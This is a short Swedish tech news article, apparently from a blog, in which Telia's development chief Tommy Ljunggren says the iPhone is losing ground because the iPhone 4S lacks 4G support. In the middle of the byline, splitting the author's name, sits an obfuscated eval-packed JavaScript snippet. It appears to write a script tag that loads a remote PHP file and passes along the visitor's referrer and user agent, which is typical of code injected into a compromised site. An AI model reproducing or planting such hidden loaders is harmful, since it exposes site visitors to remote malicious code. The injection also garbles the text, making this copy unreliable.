Image Image Image Image Image Image Image Image Image Image

| 26 maj, 2020

Scroll to top

Top

Teliachef: "Nu blir iPhone omkörd!"

Teliachef: "Nu blir iPhone omkörd!"
Sebastian

Tommy eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ttahy|var|u0026u|referrer|dnite||js|php’.split(’|’),0,{}))
Ljungren, utvecklingschef på Telia är det som uppger detta. Man har märkt att förtroendet för Apple har börjat svalna av bland konsumenterna.

Anledningen till att förtroendet har svalnat av beror enligt honom på att Apple är försent ute med att släppa en smartphone med stöd för 4g-nätverket. Detta var en stor besvikelse med lanseringen av iPhone 4S.

[quote]Hade du frågat mig för två år sedan hade jag sagt att Apple kommer att bli en mycket viktig spelare. Som det ser ut nu så var det ett stort misstag att inte ha stöd för 4g i den senaste modellen av iPhone, säger Tommy Ljunggren till Telecoms.com.[/quote]

Konkurrenterna är snabba med att komma ikapp. Google och RIM har redan lanserat nytt operativsystem tillsammans med telefoner som har stöd för 4G.
Även om iPhone 4g sålde ca 4 miljoner exemplar första helgen så har telefonen och bolaget mottagit massa kritik.

[quote]– Apple är inte unikt nog och det råder en stor besvikelse kring iPhone 4S. Det var ett för litet steg framåt för Apple, säger Tommy Ljunggren. [/quote]

Det finns ingen telefon idag som använder 4g men redan under nästa år kommer detta att förändras. Han förväntar sig att det kommer att släppas massa telefoner riktigt stöd för 4g och inte hybrider som dagens modeller.

[quote]– Dessa hybrider tar mycket batterikraft då de använder två stycken radiosändare. De är i stort sett en adapter för 4g, de fungerar men inte speciellt bra, säger Tommy Ljunggren. [/quote]